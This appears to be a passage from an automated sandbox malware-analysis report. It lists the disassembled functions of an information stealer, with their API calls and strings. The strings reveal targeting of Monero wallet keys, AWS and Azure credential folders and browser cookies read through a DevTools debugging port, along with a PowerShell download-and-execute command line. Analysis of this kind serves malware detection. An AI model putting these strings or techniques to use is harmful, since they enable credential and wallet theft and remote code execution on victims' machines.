                                • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                • String ID: .keys$\Monero\wallet.keys
                                • API String ID: 2881711868-3586502688
                                • Opcode ID: 579e43cc3d5960916b55e7f2c513b47995358cc06ad4f705d5c56edff3fc7abe
                                • Instruction ID: f6fb6120ec0e8c2a5a170b2ebb42a46b444bc2459ca87785a8895b9efa5ea8bc
                                • Opcode Fuzzy Hash: 579e43cc3d5960916b55e7f2c513b47995358cc06ad4f705d5c56edff3fc7abe
                                • Instruction Fuzzy Hash: F3A16D32A11A06ABCF22EBB4DC8AEAF77B9AF54300F054464F945EB251DB30DD158B94
                                Function 003AE720 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 003AE740
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003AE769
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AE79F
                                • lstrcat.KERNEL32(?,00000000), ref: 003AE7AD
                                • lstrcat.KERNEL32(?,\.azure\), ref: 003AE7C6
                                • memset.MSVCRT ref: 003AE805
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003AE82D
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AE85F
                                • lstrcat.KERNEL32(?,00000000), ref: 003AE86D
                                • lstrcat.KERNEL32(?,\.aws\), ref: 003AE886
                                • memset.MSVCRT ref: 003AE8C5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003AE8F1
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AE920
                                • lstrcat.KERNEL32(?,00000000), ref: 003AE92E
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 003AE947
                                • memset.MSVCRT ref: 003AE986
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$memset$FolderPathlstrcpy
                                • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 4067350539-3645552435
                                • Opcode ID: ac06b2a5a156d48fb92d739cad26bee3c7695aab2b3de20ff1d6e5cef14633de
                                • Instruction ID: 82d5d559044260f80762c620e674e4e18664446286c09202a024acc30823f12e
                                • Opcode Fuzzy Hash: ac06b2a5a156d48fb92d739cad26bee3c7695aab2b3de20ff1d6e5cef14633de
                                • Instruction Fuzzy Hash: 9671C771A50619AFDB22EB64DC4AFEE7774EF58700F010498F719AB181DF709E888B94
                                Function 003AABB2 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 297stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32 ref: 003AABCF
                                • lstrlen.KERNEL32(00F7F3A0), ref: 003AABE5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAC0D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003AAC18
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAC41
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAC84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003AAC8E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AACB7
                                • lstrlen.KERNEL32(003C4AD4), ref: 003AACD1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AACF3
                                • lstrcat.KERNEL32(00000000,003C4AD4), ref: 003AACFF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAD28
                                • lstrlen.KERNEL32(003C4AD4), ref: 003AAD3A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAD5C
                                • lstrcat.KERNEL32(00000000,003C4AD4), ref: 003AAD68
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAD91
                                • lstrlen.KERNEL32(00F7F220), ref: 003AADA7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AADCF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003AADDA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAE03
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AAE3F
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003AAE49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAE6F
                                • lstrlen.KERNEL32(00000000), ref: 003AAE85
                                • lstrcpy.KERNEL32(00000000,00F7F328), ref: 003AAEB8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen
                                • String ID: f
                                • API String ID: 2762123234-1993550816
                                • Opcode ID: 44dbc7a47298a27208794b1629e9a1afe34956670de13471de83a62526a789ed
                                • Instruction ID: d12f6d8eb35d6a7a52bcf8ef07eedfc332e5740e25a75919863dd6878636e8ae
                                • Opcode Fuzzy Hash: 44dbc7a47298a27208794b1629e9a1afe34956670de13471de83a62526a789ed
                                • Instruction Fuzzy Hash: 33B15832912E16AFCB23EB68DC49AAFB7B9FF51301F060424A815EB251DB34DD15CB91
                                Function 003B47E0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(ws2_32.dll,?,003A72A4), ref: 003B47E6
                                • GetProcAddress.KERNEL32(00000000,connect), ref: 003B47FC
                                • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 003B480D
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 003B481E
                                • GetProcAddress.KERNEL32(00000000,htons), ref: 003B482F
                                • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 003B4840
                                • GetProcAddress.KERNEL32(00000000,recv), ref: 003B4851
                                • GetProcAddress.KERNEL32(00000000,socket), ref: 003B4862
                                • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 003B4873
                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 003B4884
                                • GetProcAddress.KERNEL32(00000000,send), ref: 003B4895
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                • API String ID: 2238633743-3087812094
                                • Opcode ID: 4fca21ca1a454d60859ad96db5fc538e1f75436cc13d937c209a7c74aa11c9e6
                                • Instruction ID: 936ea46a0b11e41a340d2c158e1129362cc3f6b1f86a55aee188f004bc2f1a4a
                                • Opcode Fuzzy Hash: 4fca21ca1a454d60859ad96db5fc538e1f75436cc13d937c209a7c74aa11c9e6
                                • Instruction Fuzzy Hash: E4119C71952F20EFCB129FB5AC0DFA63ABCBA29705309081EF551E2260DAF45848FB50
                                Function 003ABE20 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003ABE53
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003ABE86
                                • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 003ABE91
                                • lstrcpy.KERNEL32(00000000,?), ref: 003ABEB1
                                • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 003ABEBD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003ABEE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003ABEEB
                                • lstrlen.KERNEL32(')"), ref: 003ABEF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003ABF13
                                • lstrcat.KERNEL32(00000000,')"), ref: 003ABF1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003ABF46
                                • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 003ABF66
                                • lstrcpy.KERNEL32(00000000,?), ref: 003ABF88
                                • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 003ABF94
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003ABFBA
                                • ShellExecuteEx.SHELL32(?), ref: 003AC00C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 4016326548-898575020
                                • Opcode ID: b99d6f5159d3eb1cd11c25899b32b281ae185cb8407c038fcbd788dc49bcdf20
                                • Instruction ID: 8f269bebd85f853f07730e831e812f2793bea7d5ff39664807092b6bf8fa1699
                                • Opcode Fuzzy Hash: b99d6f5159d3eb1cd11c25899b32b281ae185cb8407c038fcbd788dc49bcdf20
                                • Instruction Fuzzy Hash: 75619431A11A1AAFCF23AFB59C49EAFBBA8EF15300F051429F505E7202DB34C9158B90
                                Function 003B1820 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B184F
                                • lstrlen.KERNEL32(00F66F50), ref: 003B1860
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1887
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003B1892
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B18C1
                                • lstrlen.KERNEL32(003C4FA0), ref: 003B18D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B18F4
                                • lstrcat.KERNEL32(00000000,003C4FA0), ref: 003B1900
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B192F
                                • lstrlen.KERNEL32(00F66FD0), ref: 003B1945
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B196C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003B1977
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B19A6
                                • lstrlen.KERNEL32(003C4FA0), ref: 003B19B8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B19D9
                                • lstrcat.KERNEL32(00000000,003C4FA0), ref: 003B19E5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1A14
                                • lstrlen.KERNEL32(00F66FB0), ref: 003B1A2A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1A51
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003B1A5C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1A8B
                                • lstrlen.KERNEL32(00F66FC0), ref: 003B1AA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1AC8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003B1AD3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1B02
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen
                                • String ID:
                                • API String ID: 1049500425-0
                                • Opcode ID: 6bde7931071b7e2b8cca03aa1226f1f67a430859662aa25891c45fbfa894fefc
                                • Instruction ID: 933162fc1c724cb21f72408b139d4b22db550cb977e0199a2d6c2b936e0d37ee
                                • Opcode Fuzzy Hash: 6bde7931071b7e2b8cca03aa1226f1f67a430859662aa25891c45fbfa894fefc
                                • Instruction Fuzzy Hash: 83917E71601B03AFDB229FB5DCA8E6BB7E8EF14304B554828B986C7651DB34EC45CB50
                                Function 003A4760 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A4793
                                • LocalAlloc.KERNEL32(00000040,?), ref: 003A47C5
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A4812
                                • lstrlen.KERNEL32(003C4B60), ref: 003A481D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A483A
                                • lstrcat.KERNEL32(00000000,003C4B60), ref: 003A4846
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A486B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4898
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A48A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A48CA
                                • StrStrA.SHLWAPI(?,00000000), ref: 003A48DC
                                • lstrlen.KERNEL32(?), ref: 003A48F0
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A4931
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A49B8
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A49E1
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A4A0A
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A4A30
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A4A5D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 4107348322-3310892237
                                • Opcode ID: 986eee9d89a94f42d7b9b276d8a8f00bb9b979989121b6b511ae58fadd63fee5
                                • Instruction ID: 96b3f336711d176b6603e180c4ffa54eb5a524c25c3169909852ff0bb205b95f
                                • Opcode Fuzzy Hash: 986eee9d89a94f42d7b9b276d8a8f00bb9b979989121b6b511ae58fadd63fee5
                                • Instruction Fuzzy Hash: FDB18232A11A06ABCF23EF75D84A9AF77B9EF95300F054528F8469B211DB74EC158B90
                                Function 003992B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 003990C0: InternetOpenA.WININET(003BCFEC,00000001,00000000,00000000,00000000), ref: 003990DF
                                  • Part of subcall function 003990C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 003990FC
                                  • Part of subcall function 003990C0: InternetCloseHandle.WININET(00000000), ref: 00399109
                                • strlen.MSVCRT ref: 003992E1
                                • strlen.MSVCRT ref: 003992FA
                                  • Part of subcall function 00398980: std::_Xinvalid_argument.LIBCPMT ref: 00398996
                                • strlen.MSVCRT ref: 00399399
                                • strlen.MSVCRT ref: 003993E6
                                • lstrcat.KERNEL32(?,cookies), ref: 00399547
                                • lstrcat.KERNEL32(?,003C1794), ref: 00399559
                                • lstrcat.KERNEL32(?,?), ref: 0039956A
                                • lstrcat.KERNEL32(?,003C4B98), ref: 0039957C
                                • lstrcat.KERNEL32(?,?), ref: 0039958D
                                • lstrcat.KERNEL32(?,.txt), ref: 0039959F
                                • lstrlen.KERNEL32(?), ref: 003995B6
                                • lstrlen.KERNEL32(?), ref: 003995DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00399614
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                • API String ID: 1201316467-3542011879
                                • Opcode ID: 2b116b1a1292ce08e8ae39423b3910b4a543b2b726da13f1e52e465374f8e14e
                                • Instruction ID: d5eab7d7ebc6c307d9019f3d59596ff68d0d8d8853ab99a292ec891ee9603258
                                • Opcode Fuzzy Hash: 2b116b1a1292ce08e8ae39423b3910b4a543b2b726da13f1e52e465374f8e14e
                                • Instruction Fuzzy Hash: 36E11471E11219EFDF12DFA8D885BDEBBB5BF48300F1044AAE509A7241DB30AE45CB95
                                Function 003AD980 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 003AD9A1
                                • memset.MSVCRT ref: 003AD9B3
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003AD9DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 003ADA0E
                                • lstrcat.KERNEL32(?,00000000), ref: 003ADA1C
                                • lstrcat.KERNEL32(?,00F7F3E8), ref: 003ADA36
                                • lstrcat.KERNEL32(?,?), ref: 003ADA4A
                                • lstrcat.KERNEL32(?,00F7DDB0), ref: 003ADA5E
                                • lstrcpy.KERNEL32(00000000,?), ref: 003ADA8E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 003ADA95
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003ADAFE
                                Memory Dump Source
